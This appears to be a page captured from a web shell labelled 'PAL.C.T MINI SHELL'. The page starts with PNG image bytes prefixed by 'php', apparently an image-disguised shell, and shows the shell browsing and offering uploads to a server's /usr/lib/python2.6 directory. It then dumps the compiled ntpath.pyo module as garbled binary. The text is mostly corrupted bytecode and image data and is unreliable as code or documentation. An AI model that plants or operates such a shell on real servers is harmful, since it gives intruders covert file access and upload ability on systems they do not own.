php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/lib/python2.6/
upload
files >> //usr/lib/python2.6/ntpath.pyo

Lc*@s6dZddkZddkZddkZddkZddkZddkTdddddd	d
ddd
ddddddddddddddddddd d!d"d#d$d%d&d'g$Zd(Zd)Zd(Z	d*Z
d+Zd,Zd-Z
d.eijo
d/Z
nd0eijo
d,Znd1Zd2Zd3Zd4Zd5Zd6Zd7Zd8Zeiie_d9Zd:Zd;ZeZd<Zd=Zd>Zd?Z d@Z!yddAk"l#Z#Wne$j
odBZ%nXdCZ%e%Z&e'edDoei(dEdFjZ)edGZ*dS(HsCommon pathname manipulations, WindowsNT/95 version.

Instead of importing this module directly, import os and refer to this
module as os.path.
iN(t*tnormcasetisabstjoint
splitdrivetsplittsplitexttbasenametdirnametcommonprefixtgetsizetgetmtimetgetatimetgetctimetislinktexiststlexiststisdirtisfiletismounttwalkt
expandusert
expandvarstnormpathtabspathtsplitunctcurdirtpardirtseptpathseptdefpathtaltseptextseptdevnulltrealpathtsupports_unicode_filenamestrelpatht.s..s\t;t/s.;C:\bintces\Windowstos2tnulcCs|iddiS(saNormalize case of pathname.

    Makes all characters lowercase and all slashes into backslashes.R's\(treplacetlower(ts((s/usr/lib/python2.6/ntpath.pyR*scCs+t|d}|djo|d djS(sTest whether a path is absoluteits/\(R(R-((s/usr/lib/python2.6/ntpath.pyR7scGsw|}xj|D]b}d}|djo
d}nt|ow|dd!djp|dd!djo
d}qt|djp$t|djo|ddjo
d}qn|o
|}q
|ddjo8|o#|ddjo||d7}qo||7}q
|ddjo||7}q
|o1|ddjo||7}qo|d	|7}q
|d	7}q
W|S(
sJoin two or more pathname components, inserting "\" as needed.
    If any component is an absolute path, all previous path components
    will be discarded.iR.iit:iis/\s\(Rtlen(tatptpathtbtb_wins((s/usr/lib/python2.6/ntpath.pyR?s4


	(
&
cCs4|dd!djo|dd!|dfSd|fS(slSplit a pathname into drive and path specifiers. Returns a 2-tuple
"(drive,path)";  either part may be emptyiiR/iR.((R2((s/usr/lib/python2.6/ntpath.pyRzscCs|dd!djod|fS|dd!}|djp
|djo|t|}|idd}|d	jod|fS|id|d}|d	jot|}n|| ||fSd|fS(
s@Split a pathname into UNC mount point and relative path specifiers.

    Return a 2-tuple (unc, rest); either part may be empty.
    If unc is not empty, it has the form '//host/mount' (or similar
    using backslashes).  unc+rest is always the input path.
    Paths containing drive letters never have an UNC part.
    iiR/R.is//s\\s\i(RtfindR0(R2tfirstTwotnormptindex((s/usr/lib/python2.6/ntpath.pyRs


cCst|\}}t|}x+|o#||ddjo|d}q!W|| ||}}|}x'|o|ddjo|d }qjW|p|}|||fS(s~Split a pathname.

    Return tuple (head, tail) where tail is everything after the final slash.
    Either part may be empty.is/\i(RR0(R2tdtitheadttailthead2((s/usr/lib/python2.6/ntpath.pyRs
cCsti|tttS(N(tgenericpatht	_splitextRRR (R2((s/usr/lib/python2.6/ntpath.pyRscCst|dS(s)Returns the final component of a pathnamei(R(R2((s/usr/lib/python2.6/ntpath.pyRscCst|dS(s-Returns the directory component of a pathnamei(R(R2((s/usr/lib/python2.6/ntpath.pyRscCstS(sNTest for symbolic link.
    On WindowsNT/95 and OS/2 always returns false
    (tFalse(R3((s/usr/lib/python2.6/ntpath.pyRscCsUt|\}}|o|djSt|d}t|djo|ddjS(s?Test whether a path is a mount point (defined as root of drive)R.R's\iis/\(R.R's\(RRR0(R3tunctrestR2((s/usr/lib/python2.6/ntpath.pyRs
cCstidddyti|}Wntij
odSX||||x>|D]6}t||}t|ot|||qWqWWdS(sIDirectory tree walk with callback function.

    For each directory in the directory tree rooted at top (including top
    itself, but excluding '.' and '..'), call func(arg, dirname, fnames).
    dirname is the name of the directory, and fnames a list of the names of
    the files and subdirectories in dirname (excluding '.' and '..').  func
    may modify the fnames list in-place (e.g. via del or slice assignment),
    and walk will only recurse into the subdirectories whose names remain in
    fnames; this can be used to implement a filter, or to impose a specific
    order of visiting.  No semantics are defined for, or required of, arg,
    beyond that arg is always passed to func.  It can be used, e.g., to pass
    a filename pattern, or a mutable object designed to accumulate
    statistics.  Passing None for arg is common.s4In 3.x, os.path.walk is removed in favor of os.walk.t
stackleveliN(twarningstwarnpy3ktostlistdirterrorRRR(ttoptfunctargtnamestname((s/usr/lib/python2.6/ntpath.pyRs
c	Cs,|d djo|Sdt|}}x-||jo||djo|d}q,Wdtijotid}nzdtijotid}nYdtijo|Sytid}Wntj
o
d}nXt|tid}|djo tt||d|!}n|||S(	sLExpand ~ and ~user constructs.

    If user or $HOME is unknown, do nothing.it~s/\tHOMEtUSERPROFILEtHOMEPATHt	HOMEDRIVER.(R0RGtenvirontKeyErrorRR(R3R;tntuserhometdrive((s/usr/lib/python2.6/ntpath.pyRs(
 cCsd|jod|jo|Sddk}|i|id}d}d}t|}xF||jo8||}|djoq||d	}t|}y)|id}|d||d	 }Wqtj
o||}|d	}qXn|djo||d	|d
!djo||}|d	}q||d	}t|}y|id}Wn+tj
o|d|}|d	}qX|| }|tijo|ti|}q|d|d}n|djo||d	|d
!djo||}|d	}q||d	|d
!djo||d
}t|}yT|id}|| }|tijo|ti|}n|d
|d}Wqtj
o|d
|}|d	}qXqd}|d	}|||d	!}xD|djo6||jo)||}|d	}|||d	!}qW|tijo|ti|}n|d|}|djo|d	}qn||}|d	}qZW|S(sfExpand shell variables of the forms $var, ${var} and %var%.

    Unknown variables are left unchanged.t$t%iNs_-R.is'iit{t}s${(tstringt
ascii_letterstdigitsR0R9t
ValueErrorRGRT(R3R]tvarcharstresR9tpathlentctvar((s/usr/lib/python2.6/ntpath.pyR=s














cCst|todnd
\}}|ido|S|idd}t|\}}|djo1x[|d	 djo||}|d	}qlWn.|ido||}|id}n|id}d
}x|t|jo||djo||=q||djox|d
jo5||d	djo ||d	|d	5|d	8}q|d
jo|ido||=q|d	7}q|d	7}qW|o|o|i	|n||i
|S(s0Normalize path, eliminating double slashes, etc.u\u.s\R%s\\.\s\\?\R'R.iis..(u\u.(s\R%(s\\.\s\\?\(R%R.(t
isinstancetunicodet
startswithR+RtlstripRR0tendswithtappendR(R3t	backslashtdottprefixtcompsR;((s/usr/lib/python2.6/ntpath.pyRs<#



"(t_getfullpathnamecCsVt|p?t|toti}n
ti}t||}nt|S(s&Return the absolute version of a path.(RRfRgRGtgetcwdutgetcwdRR(R3tcwd((s/usr/lib/python2.6/ntpath.pyRs
cCsg|o*yt|}Wq]tj
oq]Xn-t|toti}n
ti}t|S(s&Return the absolute version of a path.(RptWindowsErrorRfRgRGRqRrR(R3((s/usr/lib/python2.6/ntpath.pyRs	tgetwindowsversioniic	Csj|ptdnt|it}t|it}|di|dijowt|\}}t|\}}t|t|Aotd||fqtd|d|dfnxYttt	|t	|D],}||i||ijoPqqW|d7}t
gt	||||}|ptSt|S(s#Return a relative version of a pathsno path specifiedis,Cannot mix UNC and non-UNC paths (%s and %s)s&path is on drive %s, start on drive %si(
R`RRRR,RtbooltrangetminR0RRR(	R3tstartt
start_listt	path_listtunc_pathRCt	unc_startR;trel_list((s/usr/lib/python2.6/ntpath.pyR$s*!"!	
(+t__doc__RGtsyststatR?REt__all__RRR RRRRtbuiltin_module_namesR!RRRRRRRR@RRRRRRRRRRtntRptImportErrorRR"thasattrRuR#R$(((s/usr/lib/python2.6/ntpath.pyt<module>sd


	
		;			!							$	*	Q	5	
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`